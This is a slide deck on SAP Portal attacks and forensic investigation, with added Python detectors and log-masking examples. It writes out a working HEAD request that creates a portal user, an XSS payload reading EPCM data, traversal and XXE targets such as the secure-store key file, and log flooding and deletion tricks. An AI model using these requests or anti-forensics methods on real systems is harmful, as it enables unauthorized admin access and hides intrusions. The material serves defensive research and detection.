to secure investments
ERPScan
Developing software for SAP security monitoring
Talks at 35+ security conferences worldwide: BlackHat
(US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.
First to develop software for NetWeaver J2EE assessment
The only solution to assess all areas of SAP Security
Research team with experience in different areas of security, from ERP and web security to mobile, embedded devices, and critical infrastructure, applying that knowledge to SAP research
Leading SAP AG partner in discovering security vulnerabilities, by number of vulnerabilities found
erpscan.com
Dmitry Chastukhin
Agenda
SAP security
Conclusion
SAP
SAP security
Espionage
Stealing financial information
Stealing corporate secrets
Stealing supplier and customer lists
Stealing HR data
Fraud
False transactions
Modification of master data
Sabotage
Denial of service
Modification of financial reports
Access to the technology network (SCADA) through trust relationships
SAP security
[Chart: number of SAP security talks per year, 2003-2013, at BlackHat, Defcon, HITB, RSA, CONFidence, DeepSec, Hacktivity, Troopers and Source; y-axis up to 35]
Is it remotely exploitable?
sapscan.com
World
SAP Dispatcher
SAP MMC
SAP HostControl
SAP Forensics
If you see no attacks, it doesn't mean there were none
[Pie chart: 70%, 10%, 4%, 2%, 2% of implementations; slice labels not recoverable]
What do we see?
A lot of research
Real attacks
Lack of logging practice
Many vulnerabilities are hard to close, so we need to at least monitor them
Awareness
SAProuter
Disable them
EP architecture
SAP Logging
If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only drawback of using the Web Dispatcher's CLF logs is that no information is available about the user executing the request (since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead).
SOURCE: SAP HELP
*Not the only drawback: many complex attacks go through POST requests, and CLF logs record the request line but not the request body.
But
The attacker must have credentials to read the log file
WRONG!
Prevention
The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers
By default only the following are masked:
Path parameter: jsessionid
Request parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword, ticket
HTTP headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)
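Added example (not from the original slides and not SAP code): a masker that applies the same default list to a captured request before an HTTP trace is stored or shipped, so that traces can be kept for investigation without keeping passwords and session tokens. The trace layout (request line, headers, blank line, form body) and the sample trace are assumptions made for this example.

```python
"""
Added example: mask the values the HTTP Provider masks by default
(jsessionid path parameter, listed request parameters, Authorization
header, JSESSIONID / MYSAPSSO2 cookies). Trace layout is assumed:
request line, header lines, blank line, form-encoded body.
"""
import re

PATH_PARAMS = {"jsessionid"}
REQUEST_PARAMS = {"j_password", "j_username", "j_sap_password", "j_sap_again",
                  "oldpassword", "confirmnewpassword", "ticket"}
HEADERS = {"authorization"}
COOKIES = {"jsessionid", "mysapsso2"}
MASK = "***"

PATH_PARAM_RE = re.compile(
    r";(" + "|".join(map(re.escape, PATH_PARAMS)) + r")=[^;/?]*", re.IGNORECASE)


def mask_query(query):
    """Mask values of sensitive keys in k=v&k2=v2 strings (query or body)."""
    out = []
    for pair in query.split("&"):
        key, sep, value = pair.partition("=")
        if sep and key.lower() in REQUEST_PARAMS:
            value = MASK
        out.append(key + sep + value)
    return "&".join(out)


def mask_request_line(line):
    """Mask 'METHOD /path;jsessionid=X?k=v HTTP/1.1' (path parameter and query)."""
    method, _, rest = line.partition(" ")
    target, space, version = rest.rpartition(" ")
    if not space:                     # no HTTP version present
        target, version = version, ""
    path, qsep, query = target.partition("?")
    path = PATH_PARAM_RE.sub(lambda m: ";" + m.group(1) + "=" + MASK, path)
    masked = method + " " + path + qsep + mask_query(query)
    return masked + (" " + version if version else "")


def mask_cookie_header(value):
    """Mask only the listed cookies, keep the others readable."""
    parts = []
    for cookie in value.split(";"):
        name, sep, val = cookie.strip().partition("=")
        if sep and name.lower() in COOKIES:
            val = MASK
        parts.append(name + sep + val)
    return " " + "; ".join(parts)


def mask_trace(trace):
    """Return the trace with all default-masked fields replaced by MASK."""
    head, blank, body = trace.partition("\n\n")
    lines = head.split("\n")
    out = [mask_request_line(lines[0])]
    for header in lines[1:]:
        name, sep, value = header.partition(":")
        lname = name.strip().lower()
        if lname in HEADERS:
            value = " " + MASK
        elif lname == "cookie":
            value = mask_cookie_header(value)
        out.append(name + sep + value)
    return "\n".join(out) + blank + mask_query(body)


# Constructed sample trace for the example (not a real capture).
SAMPLE_TRACE = (
    "POST /irj/portal;jsessionid=ABC123?j_username=admin&page=1 HTTP/1.1\n"
    "Host: portal.example\n"
    "Authorization: Basic YWRtaW46c2VjcmV0\n"
    "Cookie: JSESSIONID=ABC123; MYSAPSSO2=AjExMDAg; theme=dark\n"
    "\n"
    "j_user=admin&j_password=Secret1&j_sap_again=Secret1"
)

if __name__ == "__main__":
    print(mask_trace(SAMPLE_TRACE))
```

The lists are deliberately the slide's defaults; any application-specific parameter that carries a secret (the slide's list does not know about it) has to be added to REQUEST_PARAMS, otherwise it lands in the trace in clear.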
Access Control
Declarative (by web.xml) or programmatic (by UME)
Web Dynpro - programmatic
Portal iViews - programmatic
J2EE Web apps - declarative
Access Control
The central entity in the J2EE authorization model is the security role
Programmers define the application-specific roles in the J2EE deployment descriptors: web.xml and the SAP-specific web-j2ee-engine.xml
web.xml
<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>  <!-- only GET is constrained -->
  </web-resource-collection>
  <auth-constraint>
    <role-name>administrator</role-name>
  </auth-constraint>
</security-constraint>
Verb Tampering
Verb Tampering
To access the application with GET we need a login:password and the administrator role
What if we access the application with HEAD instead of GET? The security-constraint above lists only GET in <http-method>, so a HEAD request is not constrained at all
PROFIT!
Did you know about ctc?
Verb Tampering
Need an admin account in SAP Portal?
Just send two HEAD requests
Create a new user CONF:idence
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence
Prevention
Investigation
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
The same client is refused (401) for GET and then served (200, empty body) for HEAD on the same servlet
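Added example (not from the original slides): a detector for the signature in the two responses.log lines above. It flags a client that is refused (401/403) for GET on a path and then gets a 2xx on the same path with another verb, and, because the attacker may never send the GET at all, any 2xx answer to a non-GET/POST verb on a watched admin servlet. The log lines are constructed in the slide's layout; the watch list is an assumption.

```python
"""
Added example: verb-tampering detection over responses.log lines of the form
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s*-\s*(?P<ip>\S+)\s*:\s*(?P<method>[A-Z]+)\s+"
    r"(?P<target>\S+)\s+HTTP/[\d.]+\s+(?P<status>\d{3})\s+(?P<size>\d+)\s*$")

WATCHED = ("/ctc/ConfigServlet",)   # assumption: admin servlets worth watching


def parse_line(line):
    """Return ts, ip, method, path (query stripped), status, size; None if no match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = rec["ts"].strip()
    rec["path"] = rec.pop("target").split("?", 1)[0]
    rec["status"] = int(rec["status"])
    rec["size"] = int(rec["size"])
    return rec


def find_verb_tampering(lines):
    """Return (ts, ip, method, path, reason) tuples for suspicious requests."""
    refused = defaultdict(set)        # (ip, path) -> verbs that got 401/403
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        ok = 200 <= rec["status"] < 300
        if rec["status"] in (401, 403):
            refused[key].add(rec["method"])
        elif ok and rec["method"] != "GET" and "GET" in refused[key]:
            hits.append((rec["ts"], rec["ip"], rec["method"], rec["path"],
                         "refused for GET, accepted for " + rec["method"]))
        elif ok and rec["method"] not in ("GET", "POST") and rec["path"].startswith(WATCHED):
            hits.append((rec["ts"], rec["ip"], rec["method"], rec["path"],
                         "unusual verb on watched servlet"))
    return hits


# Constructed sample log (same layout as the slide, not a real capture).
SAMPLE_LOG = """\
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:25:10 AM ] - 192.168.192.20 : GET /irj/portal HTTP/1.1 200 5120
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:31:45 AM ] - 192.168.192.21 : HEAD /ctc/ConfigServlet?param=x HTTP/1.1 200 0
""".splitlines()

if __name__ == "__main__":
    for hit in find_verb_tampering(SAMPLE_LOG):
        print(*hit)
```

The first rule needs the refused GET to precede the hit; a rotated or flooded log (see the anti-forensics slides) can remove that context, which is why the second rule does not depend on it.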
web.xml
<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>HEAD</http-method>  <!-- HEAD is now constrained too -->
  </web-resource-collection>
  <auth-constraint>
    <role-name>administrator</role-name>
  </auth-constraint>
</security-constraint>
Mapped URL, covered by /admin/*: GET /admin/critical/CriticalAction
Invoker servlet URL, not covered by /admin/*: GET /servlet/com.sap.admin.Critical.Action
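Added example (not from the original slides and not SAP code): a small model of how a J2EE security-constraint is matched against a request, covering the verb-tampering slides and the invoker-servlet annotation above. It shows why listing only GET lets HEAD through, that the fix of also listing HEAD still leaves every unlisted verb (POST, for instance) unconstrained, and why the invoker URL /servlet/<class> is never matched by /admin/*. The matching rules follow the Servlet specification; the constraint dictionaries are a simplification made here.

```python
"""
Added example: model of J2EE security-constraint matching.
Assumed: a constraint is a dict with web-resource-collections (url patterns,
http methods) and the roles from its auth-constraint.
"""


def url_matches(pattern, path):
    """Servlet-style url-pattern matching: prefix (/x/*), extension (*.y), exact."""
    if pattern.endswith("/*"):
        prefix = pattern[:-2]
        return path == prefix or path.startswith(prefix + "/")
    if pattern.startswith("*."):
        return path.endswith(pattern[1:])
    return path == pattern


def is_constrained(constraint, method, path):
    """True if the request falls under one of the constraint's collections."""
    for coll in constraint["collections"]:
        if not any(url_matches(p, path) for p in coll["url_patterns"]):
            continue
        # An empty <http-method> list covers ALL verbs; a non-empty list covers
        # only the listed ones, every other verb is left open.
        if not coll["http_methods"] or method.upper() in coll["http_methods"]:
            return True
    return False


def check_access(constraints, method, path, caller_roles):
    """Return 'allow' or 'deny' for a caller holding the given roles."""
    for c in constraints:
        if is_constrained(c, method, path) and not (c["roles"] & set(caller_roles)):
            return "deny"
    return "allow"


def constraint(http_methods, roles=("administrator",), patterns=("/admin/*",)):
    return [{"collections": [{"url_patterns": list(patterns),
                              "http_methods": {m.upper() for m in http_methods}}],
             "roles": set(roles)}]


VULNERABLE = constraint(["GET"])          # the web.xml from the slide
SLIDE_FIX = constraint(["GET", "HEAD"])   # the fix shown above
HARDENED = constraint([])                 # no <http-method>: every verb constrained
ANON = ()                                 # unauthenticated caller: no roles

if __name__ == "__main__":
    for name, cfg in (("vulnerable", VULNERABLE), ("slide fix", SLIDE_FIX), ("hardened", HARDENED)):
        for verb in ("GET", "HEAD", "POST"):
            print(name, verb, "/admin/critical", check_access(cfg, verb, "/admin/critical", ANON))
        print(name, "GET /servlet/com.sap.admin.Critical.Action",
              check_access(cfg, "GET", "/servlet/com.sap.admin.Critical.Action", ANON))
```

Two practical consequences: omit <http-method> altogether rather than enumerating verbs, and note that no url-pattern or role list can close the invoker route, which only disappears when the invoker servlet itself is switched off.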
Invoker Servlet
Want to execute an OS command on the J2EE server remotely?
Maybe upload a backdoor as a Java class?
Or sniff all traffic?
Prevention
Investigation
#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE: uniquename=[CONF]#
#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#
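Added example (not from the original slides): a parser for the '#'-delimited records above that fills the {n} placeholders of 'Java'-formatted messages from the trailing argument fields and flags security-audit records where the caller is the unauthenticated Guest user and the message carries a user-administration action such as USER.CREATE, which is exactly what the ctc user creation leaves behind. The field positions (version, GUID, epoch-ms timestamp, category, application, logger, user, session, ..., severity, ..., format, ..., message, argument count, arguments) are inferred from the two records on the slide and are an assumption; the records are re-typed from the slide.

```python
"""
Added example: parse SAP J2EE '#'-delimited audit records and flag admin
actions performed as Guest. Field layout is inferred from the slide's
two records (an assumption, not a documented format).
"""
import re
from datetime import datetime, timezone

PLACEHOLDER_RE = re.compile(r"\{(\d+)\}")
ADMIN_ACTIONS = ("USER.CREATE",)   # extend with the UME actions you care about


def parse_record(rec):
    """Parse one record; return None if it does not look like a 1.5 record."""
    f = rec.strip().split("#")
    if len(f) < 24 or f[1] != "1.5":
        return None
    message = f[23]
    if f[20] == "Java":
        # 'Java' format: f[24] = number of args, f[25:] = the args for {0}, {1}, ...
        argc = int(f[24]) if f[24].isdigit() else 0
        args = f[25:25 + argc]
        message = PLACEHOLDER_RE.sub(
            lambda m: args[int(m.group(1))] if int(m.group(1)) < len(args) else m.group(0),
            message)
    return {
        "time": datetime.fromtimestamp(int(f[3]) / 1000, tz=timezone.utc),
        "category": f[4],
        "application": f[5],
        "logger": f[6],
        "user": f[7],
        "session": f[8],
        "severity": f[17],
        "format": f[20],
        "message": message,
    }


def find_guest_admin_actions(records):
    """Return (time, action, message) for admin actions performed as Guest."""
    hits = []
    for rec in records:
        r = parse_record(rec)
        if r is None or r["user"] != "Guest":
            continue
        if not r["category"].startswith("/System/Security/Audit"):
            continue
        for action in ADMIN_ACTIONS:
            if action in r["message"]:
                hits.append((r["time"].isoformat(), action, r["message"]))
    return hits


# Records re-typed from the slide (line breaks removed).
RECORDS = [
    "#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit"
    "#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0"
    "#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033"
    "#SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit"
    "#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE: uniquename=[CONF]#",
    "#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE"
    "#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a"
    "##0c5bfef08bc511e287e6000c29c26033#Thread[Thread50,5,SAPEngine_Application_Thread[impl:3]_Group]"
    "##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for "
    "caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#",
]

if __name__ == "__main__":
    for hit in find_guest_admin_actions(RECORDS):
        print(*hit)
```

Real records can contain '#' inside a message, which this positional split does not handle; the severity and format fields at fixed offsets are a cheap sanity check before trusting a parsed record.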
XSS
Many XSS bugs in the Portal
But the session cookie is sometimes HttpOnly
Yet when we exploit an XSS, we can use the features of SAP Portal itself:
EPCF
EPCF
EPCF provides a JavaScript API designed for client-side communication between portal components and the portal core framework
Enterprise Portal Client Manager (EPCM)
iViews can access the EPCM object from every portal page or IFrame
Every iView contains the EPCM object
<SCRIPT>
alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));
</SCRIPT>
For example, EPCF is used as a transient user-data buffer for iViews, so an XSS payload can read that buffer through EPCM even when the session cookie is HttpOnly
Prevention
Investigation
#Plain###192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
Log file: j2ee\cluster\<node>\log\system\httpaccess\responses.trc
Investigation
No traces of the change in the default log files
\cluster\server0\log\system\httpaccess\responses.log
Web Dynpro sends all data by POST, and we only see GET URLs in responses.log
But sometimes we can find information by indirect signs:
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
The client loaded images (here warning.gif of the log configurator application) from the server while the change was being made
Investigation
Directory traversal
FIX
Prevention
Investigation
Look for traversal sequences in the requested URLs:
/../
!252f..!252f (the Portal-encoded form: ! stands for %, so !252f decodes to %2f and then to /)
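Added example (not from the original slides): a normaliser for URLs taken from responses.log that serves this slide and the XSS Investigation slide above. The Portal writes % as ! inside path segments (pcd!3aportal_content!2f... on a later slide), so a traversal can arrive as !252f..!252f and the raw log line never contains a literal /../; the decoder repeats %XX and !XX decoding until the string stops changing, then applies the two indicators the slides use, the traversal sequence and the injected script tag. The sample URLs are constructed here from the slides' examples.

```python
"""
Added example: decode Portal '!XX' and standard '%XX' escapes (including
double encoding) before matching the traversal and XSS indicators.
"""
import re
from urllib.parse import unquote

BANG_ESCAPE_RE = re.compile(r"!([0-9A-Fa-f]{2})")
INDICATORS = {
    "traversal": re.compile(r"(^|[/\\])\.\.([/\\]|$)"),
    "xss": re.compile(r"<\s*/?\s*script\b"),
}


def normalise(url, max_rounds=5):
    """Decode %XX and !XX escapes repeatedly (bounded), then lower-case."""
    current = url
    for _ in range(max_rounds):
        decoded = unquote(BANG_ESCAPE_RE.sub(lambda m: "%" + m.group(1), current))
        if decoded == current:
            break
        current = decoded
    return current.lower()


def classify(url):
    """Return the sorted indicator names matching the decoded URL (empty = clean)."""
    decoded = normalise(url)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))


# Constructed sample URLs (first one re-typed from the XSS slide).
SAMPLE_URLS = [
    "/irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping"
    "?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E",
    "/app/files/!252f..!252f..!252fsecret.txt",
    "/irj/portal",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(classify(url) or ["clean"], normalise(url))
```

A legitimate name containing ! followed by two hex digits (for instance !ab) is decoded as if it were an escape, so expect some false positives from the ! rule and keep the raw URL alongside the decoded one in any alert.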
Directory Traversal
OS Command execution
XML External Entity (XXE)
XXE in Portal
XXE
SecStore.properties
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
config.properties
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
config.properties names both the encrypted secure store (SecStore.properties, holding admin/password and jdbc/pool) and the key file that decrypts it, so an XXE that reads local files can collect both
Prevention
Investigation
POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fadministrator!2fsuper_admin!2fsuper_admin_role!2fcom.sap.portal.content_administration!2fcom.sap.portal.content_admin_ws!2fcom.sap.km.AdminContent!2fcom.sap.km.AdminContentExplorer!2fcom.sap.km.AdminExplorer/ HTTP/1.1
Investigation
The only way to get HTTP POST request values is to enable HTTP Trace:
Visual Administrator -> Dispatcher -> HTTP Provider -> Properties: HttpTrace = enable
For 6.4 and 7.0 SP12 and lower:
On the Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc
On the Server: \j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
Portal post-exploitation
Lots of links to other systems in the corporate LAN
Using SSRF, attackers can reach these systems
What is SSRF?
[Diagram: direct attack sends GET /vuln.jsp straight to the HTTP server; SSRF attack sends packet A to the HTTP server, which carries packet B (GET /vuln.jsp) on to a host inside the corporate network]
Exploit OS vulnerabilities
Exploit old SAP application vulnerabilities
Bypass SAP security restrictions
Exploit vulnerabilities in local services
Portal post-exploitation
Anti-forensics
Anti-forensics
Flooding
Deleting
Changing
Anti-forensics
Log flooding
5 active logs
Maximum log file size is 10 MB
Archiving happens when all logs reach the maximum size:
if file.0.log reaches the maximum size, file.1.log is opened
when file.4.log reaches the maximum size, all files are zipped and backed up
the same files are rewritten after archiving
So about 50 MB of junk requests is enough to push everything logged before them out of the active files into the archive
Anti-forensics
Log deleting
SAP locks write access only to the one active log
The other log files can be read and written, so it is possible to delete them
But a missing log can itself give away the attacker's presence
Log changing
SAP locks write access only to the one active log
It is possible to write into any other log file
Patching
Secure configuration
Enabling HTTP Trace with masking
Malicious script filter
Log archiving
Additional place for log storage
Monitoring of security events
Your own scripts that parse common attack patterns
ERPScan has patterns for all known web vulnerabilities and 0-days
Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure
SAP Guides
Regular security assessments
Monitoring technical security
Future work
I'd like to thank SAP's Product Security Response Team for the great cooperation in making SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
July 31 BlackHat (Las Vegas, USA)
Web: www.erpscan.com
e-mail: info@erpscan.com
Twitter: @erpscan, @_chipik, @neyolov